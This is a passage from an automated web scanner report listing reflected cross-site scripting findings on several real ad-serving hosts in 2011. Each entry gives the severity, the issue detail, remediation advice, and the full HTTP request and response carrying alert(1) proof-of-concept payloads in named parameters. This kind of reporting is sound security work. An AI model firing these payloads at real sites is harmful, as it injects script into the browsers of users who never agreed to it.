document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/idgt.curse/idgtcoad;sec=video;sec=coad;tile=2;sz=300x250;net=idgt;ord=9047505581424790?&8b429'-alert(1)-'c56bbbc539a=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.8. http://a.collective-media.net/adj/idgt.curse/idgtcoad [sec parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/idgt.curse/idgtcoad

Issue detail

The value of the sec request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48b48'-alert(1)-'d9ff14e8a82 was submitted in the sec parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/idgt.curse/idgtcoad;sec=video;sec=coad;tile=2;sz=300x250;ord=9047505581424790?48b48'-alert(1)-'d9ff14e8a82 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: cli=11fda490648f83c; JY57=3kllfTqBzxxTNc9vAlundMYc3uaxeM3o8ANWZfHmJX3kmfPanrzCyLw; dc=dc; nadp=1; exdp=1; vadp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 486
Date: Sat, 23 Jul 2011 04:48:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 22-Aug-2011 04:48:40 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/idgt.curse/idgtcoad;sec=video;sec=coad;tile=2;sz=300x250;net=idgt;ord=9047505581424790?48b48'-alert(1)-'d9ff14e8a82;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.9. http://a.collective-media.net/adj/q1.boston/life [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.boston/life

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8194'-alert(1)-'c19d349c966 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.bostonb8194'-alert(1)-'c19d349c966/life;sz=728x90;click0=;ord=1100566473? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=120221f8320d7dc; JY57=3Xb5lD-USjwD8RbugxhH_yfexKlm_w7BvRZXEZ3OiTN5kUf_u1eMoCg; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 445
Date: Sat, 23 Jul 2011 13:48:17 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 22-Aug-2011 13:48:17 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.bostonb8194'-alert(1)-'c19d349c966/life;sz=728x90;net=q1;ord=1100566473;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.10. http://a.collective-media.net/adj/q1.boston/life [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.boston/life

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b33bd'-alert(1)-'80c1110add4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.boston/lifeb33bd'-alert(1)-'80c1110add4;sz=728x90;click0=;ord=1100566473? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=120221f8320d7dc; JY57=3Xb5lD-USjwD8RbugxhH_yfexKlm_w7BvRZXEZ3OiTN5kUf_u1eMoCg; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 445
Date: Sat, 23 Jul 2011 13:48:17 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 22-Aug-2011 13:48:17 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.boston/lifeb33bd'-alert(1)-'80c1110add4;sz=728x90;net=q1;ord=1100566473;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.11. http://a.collective-media.net/adj/q1.boston/life [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.boston/life

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d913'-alert(1)-'3feb78746bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.boston/life;sz=728x90;click0=;ord=1100566473?&1d913'-alert(1)-'3feb78746bb=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=120221f8320d7dc; JY57=3Xb5lD-USjwD8RbugxhH_yfexKlm_w7BvRZXEZ3OiTN5kUf_u1eMoCg; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 449
Date: Sat, 23 Jul 2011 13:48:16 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 22-Aug-2011 13:48:16 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.boston/life;sz=728x90;net=q1;ord=1100566473?&1d913'-alert(1)-'3feb78746bb=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.12. http://a.collective-media.net/adj/q1.boston/life [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.boston/life

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56604'-alert(1)-'a336edbc83a was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.boston/life;sz=728x90;click0=;ord=1100566473?56604'-alert(1)-'a336edbc83a HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=120221f8320d7dc; JY57=3Xb5lD-USjwD8RbugxhH_yfexKlm_w7BvRZXEZ3OiTN5kUf_u1eMoCg; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 446
Date: Sat, 23 Jul 2011 13:48:15 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 22-Aug-2011 13:48:15 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.boston/life;sz=728x90;net=q1;ord=1100566473?56604'-alert(1)-'a336edbc83a;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.13. http://a.collective-media.net/adj/q1.q.boston/be_life [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.boston/be_life

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 716af'-alert(1)-'eaa09b6c518 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.boston716af'-alert(1)-'eaa09b6c518/be_life;sz=728x90;ord=971628896? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=120221f8320d7dc; JY57=3Xb5lD-USjwD8RbugxhH_yfexKlm_w7BvRZXEZ3OiTN5kUf_u1eMoCg; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 449
Date: Sat, 23 Jul 2011 13:48:32 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 22-Aug-2011 13:48:32 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.boston716af'-alert(1)-'eaa09b6c518/be_life;sz=728x90;net=q1;ord=971628896;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.14. http://a.collective-media.net/adj/q1.q.boston/be_life [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.boston/be_life

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be8ae'-alert(1)-'98331bd179c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.boston/be_lifebe8ae'-alert(1)-'98331bd179c;sz=728x90;ord=971628896? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=120221f8320d7dc; JY57=3Xb5lD-USjwD8RbugxhH_yfexKlm_w7BvRZXEZ3OiTN5kUf_u1eMoCg; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 449
Date: Sat, 23 Jul 2011 13:48:32 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 22-Aug-2011 13:48:32 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.boston/be_lifebe8ae'-alert(1)-'98331bd179c;sz=728x90;net=q1;ord=971628896;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.15. http://a.collective-media.net/adj/q1.q.boston/be_life [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.boston/be_life

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e409'-alert(1)-'2bccaf234b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.boston/be_life;sz=728x90;ord=971628896?&5e409'-alert(1)-'2bccaf234b5=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=120221f8320d7dc; JY57=3Xb5lD-USjwD8RbugxhH_yfexKlm_w7BvRZXEZ3OiTN5kUf_u1eMoCg; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 453
Date: Sat, 23 Jul 2011 13:48:32 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 22-Aug-2011 13:48:32 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.boston/be_life;sz=728x90;net=q1;ord=971628896?&5e409'-alert(1)-'2bccaf234b5=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.16. http://a.collective-media.net/adj/q1.q.boston/be_life [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.boston/be_life

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25988'-alert(1)-'2536406d3ba was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.boston/be_life;sz=728x90;ord=971628896?25988'-alert(1)-'2536406d3ba HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=120221f8320d7dc; JY57=3Xb5lD-USjwD8RbugxhH_yfexKlm_w7BvRZXEZ3OiTN5kUf_u1eMoCg; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 450
Date: Sat, 23 Jul 2011 13:48:31 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 22-Aug-2011 13:48:31 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.boston/be_life;sz=728x90;net=q1;ord=971628896?25988'-alert(1)-'2536406d3ba;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.17. http://a.collective-media.net/cmadj/cm.yearbook/ford_ron_071911 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/cm.yearbook/ford_ron_071911

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload def1c'-alert(1)-'c357eca95f6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.yearbookdef1c'-alert(1)-'c357eca95f6/ford_ron_071911;sz=300x250;net=cm;ord=1520731557;ord1=218732;cmpgurl=http%253A//games.myyearbook.com/? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: cli=11fda490648f83c; JY57=3kllfTqBzxxTNc9vAlundMYc3uaxeM3o8ANWZfHmJX3kmfPanrzCyLw; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Thu, 21 Jul 2011 18:00:53 GMT
Content-Length: 8539
Connection: close
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Fri, 22-Jul-2011 18:00:53 GMT
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Thu, 28-Jul-2011 18:00:53 GMT
Set-Cookie: vadp=1; domain=collective-media.net; path=/; expires=Thu, 28-Jul-2011 18:00:53 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Thu, 28-Jul-2011 18:00:53 GMT

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-10222814201_1311271253","http://ib.adnxs.com/ptj?member=311&inv_code=cm.yearbookdef1c'-alert(1)-'c357eca95f6&size=300x250&imp_id=cm-10222814201_1311271253,11fda490648f83c&referrer=http%3A%2F%2Fgames.myyearbook.com%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.yearbookdef1c%27-alert%281%29-%27c357eca95f
...[SNIP]...

3.18. http://a.collective-media.net/cmadj/cm.yearbook/ford_ron_071911 [sz parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://a.collective-media.net
Path:   /cmadj/cm.yearbook/ford_ron_071911

Issue detail

The value of the sz request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5fa4e(a)a8c98bec559 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.yearbook/ford_ron_071911;sz=5fa4e(a)a8c98bec559 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: cli=11fda490648f83c; JY57=3kllfTqBzxxTNc9vAlundMYc3uaxeM3o8ANWZfHmJX3kmfPanrzCyLw; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Thu, 21 Jul 2011 18:00:52 GMT
Content-Length: 8446
Connection: close
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Fri, 22-Jul-2011 18:00:52 GMT
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Thu, 28-Jul-2011 18:00:52 GMT
Set-Cookie: vadp=1; domain=collective-media.net; path=/; expires=Thu, 28-Jul-2011 18:00:52 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Thu, 28-Jul-2011 18:00:52 GMT

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
s/collective",false);CollectiveMedia.addPixel("http://ev.ib-ibi.com/image.sbix?go=2223&pid=15",false);var bap_rnd = Math.floor(Math.random()*100000);
var _bao = {
coid:44,
nid:546,
ad_h:,
ad_w:5fa4e(a)a8c98bec559,
uqid:bap_rnd,
cps:'cm,bz'
};
document.write('<img style="margin:0;padding:0;" border="0" width="0" height="0" src="http://c.betrad.com/a/4.gif" id="bap-pixel-'+bap_rnd+'"/>
...[SNIP]...

3.19. http://a.fsdn.com/adops/google/rev2/afc/css/ [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.fsdn.com
Path:   /adops/google/rev2/afc/css/

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 571d6<script>alert(1)</script>cb7344dcae0 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adops/google/rev2/afc/css/?fn=afc_sf_imu_grey_x1.css&id=fad72571d6<script>alert(1)</script>cb7344dcae0&class=ad HTTP/1.1
Host: a.fsdn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://sourceforge.net/projects/hoytllc-vcloud/

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/css; charset=ISO-8859-1
Vary: Accept-Encoding
Cache-Control: public, max-age=1209600
Expires: Sat, 06 Aug 2011 04:42:34 GMT
Date: Sat, 23 Jul 2011 04:42:34 GMT
Content-Length: 1274
Connection: close

#fad72571d6<script>alert(1)</script>cb7344dcae0 {
   width:300px;
   height:250px;
}

#fad72571d6<script>alert(1)</script>cb7344dcae0 div.google_afc {
   width:300px;
   height:250px;
   text-align:center;

...[SNIP]...

3.20. http://a.netmng.com/hic/ [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.netmng.com
Path:   /hic/

Issue detail

The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b532"><script>alert(1)</script>1c809b7e17d was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hic/?nm_width=300&nm_height=250&nm_publ=178&nm_c=200&beacon=march2011&url=trafficmp&passback=&click=http%3A%2F%2Flm.trafficmp.com%2Fclicksense%2Fclick%3Ft%3D3552737354895902192%26l%3D908365%26ad%3D96040%26s%3D917258%26c%3Dhttp%3A%2F%2Fmedia.trafficmp.com%2Fa%2Fclick%3F_-611797114104433*_3107*levM_99*sPC_115*Byp_3443735*lpF_3247**kx3bm41vejeq___3533310**0_3805*MEn_114**_-8628394437b532"><script>alert(1)</script>1c809b7e17d HTTP/1.1
Host: a.netmng.com
